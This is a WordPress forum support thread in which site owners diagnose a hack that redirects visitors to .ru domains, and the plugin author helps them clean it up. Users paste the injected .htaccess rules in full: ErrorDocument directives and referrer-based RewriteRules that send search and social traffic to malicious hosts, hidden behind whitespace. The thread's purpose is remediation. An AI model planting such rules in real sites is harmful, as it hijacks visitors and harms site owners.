WordPress.org

Ready to get started?Download WordPress

Forums

Add Link to Facebook
links are hijacked to softwarepromo.ru (35 posts)

  1. deenorris
    Member
    Posted 2 years ago #

    All my facebook links are being hijacked to softwarepromo.ru and eventually activationcode.ru.

    When I tried to edit your plug-in, my browser makes several calls to softwarepromo.ru and then loads a bad imitation of the wordpress dashboard.

    What is your relation to this domain.

    Google is blocking all websites with links to my site using your plug-in

    http://wordpress.org/extend/plugins/add-link-to-facebook/

  2. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    I have no relation to this domain.

    My best guess: your WordPress installation has been hacked.

  3. deenorris
    Member
    Posted 2 years ago #

    Yes, I am sure it has been hacked, but it is only this plugin that is affected. Someone is writing a hack specifically for this. Trying to delete the plugin causes the same poor quality fake dashboard.

  4. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Contact me through the contact form here and I will see what I can do for you.

  5. deenorris
    Member
    Posted 2 years ago #

    This turns out to be a htaccess hakc-

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    																														ErrorDocument 400 http://promosoftware.ru/apacabar/inde.php
    																														ErrorDocument 401 http://promosoftware.ru/apacabar/inde.php
    																														ErrorDocument 403 http://promosoftware.ru/apacabar/inde.php
    																														ErrorDocument 404 http://promosoftware.ru/apacabar/inde.php
    																														ErrorDocument 500 http://promosoftware.ru/apacabar/inde.php
    																														<IfModule mod_rewrite.c>
    																														RewriteEngine On
    																														RewriteCond %{HTTP_REFERER} .*google.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*qq.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*search.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*blog.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*live.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*mail.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*ya.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*aport.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
    																														RewriteCond %{HTTP_REFERER} .*flickr.*
    																														RewriteRule ^(.*)$ http://promosoftware.ru/apacabar/inde.php [R=301,L]
    																														</IfModule>
  6. deenorris
    Member
    Posted 2 years ago #

    Be sure to scroll right to see the entire hack.

  7. hartman27
    Member
    Posted 2 years ago #

    So what now? Where and how do I take care of this problem?

  8. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    If you have this problem: edit your .htaccess file, delete the rules below the WordPress section and protect it from changing again.

    To be clear: this problem has nothing to do with Add Link to Facebook itself.

  9. hartman27
    Member
    Posted 2 years ago #

    Now which .htaccess file? There is one in the main area and one in the logs folder. Probably more as well. I just don't want to kill the wrong thing and, so far, I can't find what deenorris is showing up top. But believe me it is the problem.

  10. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Post the content of both .htaccess files here or use this contact form to send them to me (you will have to zip them) and I will see if I can help you with this.

    My best guess it is the one in the root folder of your WordPress installation.

  11. hartman27
    Member
    Posted 2 years ago #

    This is the one in the main area...

    AddType x-mapp-php5 .php

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    # BEGIN Audiobar
    # END Audiobar

    This is the one in the logs folders

    Options +Indexes
    Satisfy any
    Order Deny,Allow
    Allow from 172.17.0.0/16
    Allow from 212.227.35.64/27
    Allow from 212.227.34.151
    Allow from 212.227.34.190
    Deny from all
    RemoveType .html .gif
    AuthType Basic
    AuthName "Access to /logs"
    AuthUserFile /kunden/homepages/24/d275942758/htpasswd
    Require user u52290778

  12. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    I don't see any problem.
    Did you scroll down and left to see if there is more hidden?

  13. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Concentrate on the first one, the second is probably not relevant.

  14. hartman27
    Member
    Posted 2 years ago #

    GOT HIM! Here's the better copy of the first one. (Scroll way down)

    AddType x-mapp-php5 .php

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    # BEGIN Audiobar
    # END Audiobar

    ErrorDocument 400 http://software-promo.ru/klm/index.php
    ErrorDocument 401 http://software-promo.ru/klm/index.php
    ErrorDocument 403 http://software-promo.ru/klm/index.php
    ErrorDocument 404 http://software-promo.ru/klm/index.php
    ErrorDocument 500 http://software-promo.ru/klm/index.php
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
    RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
    RewriteCond %{HTTP_REFERER} .*qq.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
    RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
    RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
    RewriteCond %{HTTP_REFERER} .*blog.* [OR]
    RewriteCond %{HTTP_REFERER} .*live.* [OR]
    RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail.* [OR]
    RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
    RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
    RewriteCond %{HTTP_REFERER} .*ya.* [OR]
    RewriteCond %{HTTP_REFERER} .*aport.* [OR]
    RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ http://software-promo.ru/klm/index.php [R=301,L]
    </IfModule>

  15. hartman27
    Member
    Posted 2 years ago #

    Just delete everything including audiobar?

  16. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    No, only remove:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    
    ... up to ...
    
    </IfModule>
  17. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Could you please send me the debug information as described in the last question of the FAQ, so I can see what you and 'deenorris' might have in common?

    The question remains how this could happen.

    Try to set the permission of .htaccess to 644 or maybe better 604: source.

  18. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    @deenorris: could you send me your debug info too, please?

  19. deenorris
    Member
    Posted 2 years ago #

    You need to modify the .HTACCESS in the PUBLIC_HTML folder to removed the hack.

    First you need to change the permissions because the hack sets it 444.

    Once you have edited the .HTACCESS file, you should harden it by setting it back to 444.

    This is a hack using wordpress itself to modify the .HTACCESS file.

    Good Luck

  20. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Which hosting provider are you both using?
    I am curious if it happen to be the same one.

  21. deenorris
    Member
    Posted 2 years ago #

    Never even got as far as debug. Once I figured out the .HTACCESS trick, I removed the offending IF BLOCK and it was fine.

    It was odd that every time I tried to access ADD LINK from the dashboard, it make a call to the .RU address and I got the crappy imitation. Once I removed the .HTACCESS hack, it stopped.

    Again, I am not accusing, but clearly something is going on.

    When I spoke to my hosting company, HOSTMONSTER, they said they are seeing a lot of this hack in the past week or so from WP users.

  22. hartman27
    Member
    Posted 2 years ago #

    How do I change permissions? Sorry, tech savy but a technical newbie.

  23. hartman27
    Member
    Posted 2 years ago #

    I'm with 1&1 btw.

  24. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Using FTP or using the dashboard of your hosting provider.

  25. hartman27
    Member
    Posted 2 years ago #

    Found the permissions in filezilla.

  26. Marcel Bokhorst
    Member
    Plugin Author

    Posted 2 years ago #

    Please don't forget to send me the debug information. Maybe I can find what you have in common, except for Add Link to Facebook (without saying that Add Link to Facebook couldn't be the cause, but I have no idea how). From the FAQ:

    S02 How can I send the debug information?
    Go to the plugin page (via the Tools menu) and click on the link Debug information in the Resources panel. Optionally fill in your name and describe the problem as accurate as possible and press the Send button.

  27. hartman27
    Member
    Posted 2 years ago #

    I keep trying to edit and save the new .htaccess but it says "critical file transfer error" any ideas?

  28. deenorris
    Member
    Posted 2 years ago #

  29. deenorris
    Member
    Posted 2 years ago #

    you have to change the permissions to allow Owner Read/Write first

    The hack sets the file to read only

  30. hartman27
    Member
    Posted 2 years ago #

    M66B The wordpress administration panel plugin page? Can't seem to find it.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic